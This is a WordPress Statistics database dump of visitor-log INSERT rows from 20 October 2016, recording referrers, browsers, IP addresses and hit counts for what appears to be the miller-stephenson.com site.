INSERT INTO `wp_statistics_visitor` VALUES (7065, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '91.90.114.5', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7066, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '115.135.148.33', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7067, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '181.91.221.133', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7068, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '93.176.214.10', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7069, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '2.89.227.232', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7070, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '41.209.69.221', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7071, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '2.177.121.73', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7072, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '86.23.120.83', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7073, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '41.251.70.63', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7074, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '125.188.80.47', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7075, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '188.167.17.116', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7076, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '193.198.63.4', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7077, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '46.32.126.193', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7078, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '182.160.125.202', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7079, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '41.142.159.69', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7080, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '43.248.73.2', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7081, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '217.76.35.178', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7082, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '94.119.96.0', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7083, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '93.119.172.18', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7084, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '79.20.218.65', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7085, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '202.188.56.225', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7086, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '112.201.24.212', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7087, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '78.191.233.20', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7088, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '79.161.28.200', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7089, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '216.230.135.100', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7090, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '45.120.74.12', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7091, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '73.205.209.251', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7092, '2016-10-20', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=9&ved=0ahUKEwiz27_UsenPAhVKOD4KHRwEDbgQFgg7MAg&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fms-470c%2F&usg=AFQjCNFaBkGgXuHfET1asT6UmbjebgQv-g&bvm=bv.136499718,d.cWw', 'MSIE', 'Windows', '11.0', '', '206.123.250.226', '000', 19, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7093, '2016-10-20', 'https://www.google.ca/aclk?sa=L&ai=DChcSEwj0-dDSs-nPAhUIZIYKHZTnC80YABAG&sig=AOD64_1MyNkai4J1A2wU2pNYSjRpITvDfQ&rct=j&q=&ved=0ahUKEwiWsc3Ss-nPAhVLLSYKHUv0CmcQ0QwIKA&adurl=', 'MSIE', 'Windows', '11.0', '', '38.99.136.66', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7094, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '178.79.25.121', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7095, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '24.107.86.210', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7096, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '213.87.146.20', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7097, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '163.47.149.189', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7098, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '95.121.21.126', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7099, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '49.145.58.63', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7100, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '41.13.14.129', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7101, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '197.200.40.79', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7102, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '121.219.25.119', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7103, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '39.40.57.36', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7104, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '182.186.239.230', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7105, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '49.146.219.73', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7106, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '119.94.105.85', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7107, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '67.169.144.174', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7108, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '175.115.103.20', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7109, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '195.46.191.154', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7110, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '212.252.80.8', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7111, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '116.105.33.21', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7112, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '99.44.126.56', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7113, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '49.34.241.189', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7114, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '144.76.31.247', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7115, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '213.182.240.118', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7116, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '125.99.128.238', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7117, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '194.96.36.2', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7118, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '92.251.89.103', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7119, '2016-10-20', 'https://www.miller-stephenson.com', 'MSIE', 'Unknown', '8.0', '', '91.134.1.133', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7120, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '86.89.94.154', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7121, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '75.140.200.145', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7122, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '82.229.187.77', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7123, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '86.85.27.222', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7124, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '78.96.224.62', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7125, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '123.201.234.112', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7126, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '114.143.185.87', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7127, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '46.19.230.42', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7128, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '121.121.104.137', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7129, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '37.192.167.191', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7130, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '105.107.6.131', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7131, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '105.108.48.194', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7132, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '197.216.22.181', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7133, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '45.116.187.148', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7134, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '91.176.26.4', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7135, '2016-10-20', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.11.9600.18499', '', '173.167.26.113', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7136, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '80.232.219.122', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7137, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '105.158.132.46', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7138, '2016-10-20', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '165.156.24.5', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7139, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '59.98.118.206', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7140, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '59.88.152.115', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7141, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '141.136.197.37', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7142, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '190.37.68.149', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7143, '2016-10-20', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '131.167.254.131', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7144, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '182.58.4.147', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7145, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '117.197.142.60', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7146, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '196.1.211.174', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7147, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '179.180.214.73', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7148, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '105.102.91.179', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7149, '2016-10-20', 'https://www.mschem.com/miller/index.php', 'Chrome', 'Windows', '53.0.2785.143', '', '50.151.36.144', '000', 71, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7150, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '103.251.50.35', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7151, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '213.17.38.147', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7152, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '124.123.87.199', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7153, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '82.160.152.52', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7154, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '112.209.187.69', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7155, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '125.16.217.186', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7156, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '103.16.171.30', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7157, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '46.169.43.66', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7158, '2016-10-20', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '71.227.105.185', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7159, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '122.173.186.205', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7160, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '133.236.79.109', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7161, '2016-10-20', 'https://www.google.tn/', 'Chrome', 'Windows', '54.0.2840.59', '', '41.224.8.26', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7162, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '119.193.162.167', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7163, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '180.190.118.107', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7164, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '122.167.179.149', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7165, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '61.247.4.254', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7166, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '85.40.191.228', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7167, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '185.132.92.29', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7168, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '49.150.15.17', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7169, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '109.66.41.246', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7170, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '181.171.12.26', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7171, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '80.251.6.194', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7172, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '190.131.18.169', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7173, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '192.168.192.237', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7174, '2016-10-20', 'https://www.google.com.mx/', 'Chrome', 'Windows', '53.0.2785.143', '', '189.139.156.238', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7175, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '112.208.177.108', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7176, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '105.159.93.252', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7177, '2016-10-20', 'https://www.miller-stephenson.com/miller/adhesive_kits.html', 'MSIE', 'Windows', '9.0', '', '182.118.20.234', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7178, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '87.18.219.66', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7179, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '41.218.209.207', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7180, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '124.189.220.55', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7181, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '41.33.194.10', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7182, '2016-10-20', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '213.254.241.7', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7183, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '162.72.163.239', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7184, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '120.28.191.4', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7185, '2016-10-20', 'https://www.google.com.tr/', 'Chrome', 'Windows', '53.0.2785.143', '', '212.175.18.74', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7186, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '212.156.137.106', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7187, '2016-10-20', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '66.170.45.206', '000', 12, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7188, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '2.126.234.86', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7189, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '45.124.48.85', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7190, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '81.107.187.185', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7191, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '219.250.30.77', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7192, '2016-10-20', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '120.29.81.146', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7193, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '49.149.193.155', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7194, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '180.68.154.63', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7195, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '93.168.167.120', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7196, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '139.5.241.99', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7197, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '78.45.114.45', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7198, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '62.113.20.73', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7199, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '220.83.76.246', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7200, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '82.131.161.234', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7201, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '41.32.179.81', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7202, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '10.0.0.53', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7203, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '116.73.215.218', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7204, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '94.228.226.121', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7205, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '211.221.146.132', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7206, '2016-10-20', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '173.166.94.229', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7207, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '182.185.67.141', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7208, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '144.139.135.98', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7209, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '91.245.80.71', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7210, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '197.148.114.110', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7211, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '197.156.133.81', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7212, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '178.129.41.202', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7213, '2016-10-20', 'https://www.bing.com/', 'MSIE', 'Windows', '11.0', '', '173.13.100.13', '000', 19, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7214, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '95.70.251.141', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7215, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '87.239.217.104', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7216, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '27.4.163.33', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7217, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '196.203.31.162', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7218, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '197.49.33.212', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7219, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '218.52.63.92', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7220, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '73.109.58.144', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7221, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '24.133.247.203', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7222, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '79.174.34.222', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7223, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '179.211.232.166', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7224, '2016-10-20', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '50.62.208.38', '000', 36, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (7225, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '86.97.218.106', '000', 7, 0); 
